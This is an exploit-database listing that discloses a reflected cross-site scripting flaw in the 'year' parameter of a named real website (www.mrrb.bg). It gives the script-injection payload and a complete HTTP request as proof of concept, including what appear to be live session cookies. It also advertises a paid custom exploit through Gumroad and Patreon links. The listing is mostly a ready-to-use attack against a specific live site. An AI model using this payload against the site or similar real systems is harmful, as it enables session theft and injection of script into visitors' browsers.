Share
## https://sploitus.com/exploit?id=PACKETSTORM:213572
## Titles: mrrb.bg-APP - XSS-Reflected
    ## Author: nu11secur1ty
    ## Date: 01/06/2026
    ## Vendor: mrrb.bg
    ## Software: mrrb.bg
    ## Reference: https://portswigger.net/web-security/cross-site-scripting
    
    ## Description:
    The value of the `year` request parameter is copied into the value of an
    HTML tag attribute which is encapsulated in double quotation marks. The
    payload fchd2"><script>alert(1)</script>a1mg2 was submitted in the year
    parameter. This input was echoed unmodified in the application's response.
    
    STATUS: HIGH- Vulnerability
    
    [+]PoC:
    ```
    GET
    /en/reload-calendar/?month=12&year=2025fchd2%22%3e%3cscript%3ealert(1)%3c%2fscript%3ea1mg2
    HTTP/2
    Host: www.mrrb.bg
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
    Accept: text/html, */*; q=0.01
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Cookie: GeneralAppGenSession=jqlrr36bq8q2d2ucrpm9o49g25;
    _ga=GA1.2.1383633579.1767642035; _gid=GA1.2.449285359.1767642035; _gat=1;
    _ga_S2X8R0459V=GS2.2.s1767642035$o1$g1$t1767642039$j56$l0$h0
    X-Requested-With: XMLHttpRequest
    Referer: https://www.mrrb.bg/en/
    ```
    
    [+]Custom PoC - Exploit:
    ```
    170 Euro
    ```
    ## Link:
    [href](https://venvar.gumroad.com/l/fpfywm)
    
    ## Demo PoC:
    [href](https://www.patreon.com/posts/mrrb-bg-xss-147550429)
    
    ## Time spent:
    04:27:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <https://nu11secur1ty.blogspot.com/>